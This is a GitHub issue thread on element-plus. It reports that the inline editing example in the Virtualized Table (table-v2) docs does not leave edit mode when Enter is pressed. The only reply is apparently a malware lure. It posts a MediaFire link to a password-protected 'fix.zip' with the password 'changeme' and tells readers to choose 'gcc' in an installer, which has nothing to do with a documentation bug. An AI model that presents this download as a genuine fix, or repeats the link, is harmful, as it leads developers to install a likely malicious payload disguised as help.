### ISSUE TITLE
[Docs] [table-v2] The Inline editing example of the Virtualized Table component is inaccurate

### ISSUE THREAD

**Issue by Mutter45** [element-plus/element-plus#18017]
Bug Type: **`Docs`**

## Environment

- Vue Version: `3.4.0`
- Element Plus Version: `2.8.1`
- Browser / OS: `Chrome/127.0.0.0`
- Build Tool: `Vite`

### Related Component

- `el-table-v2`

### Reproduction Link

[Docs](https://element-plus.org/en-US/component/table-v2.html)

### Steps to reproduce

1. Inline editing usage examples
2. Edit column,Pressing the `enter` key does not exit the editing state

### What is Expected?

Press the `enter` key to exit the editing state

### What is actually happening?

Pressing the `enter` key does not exit the editing state

### Additional comments

_(empty)_

![image](https://github.com/user-attachments/assets/a25168ef-fadc-444c-9430-1071ba388f7f)

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
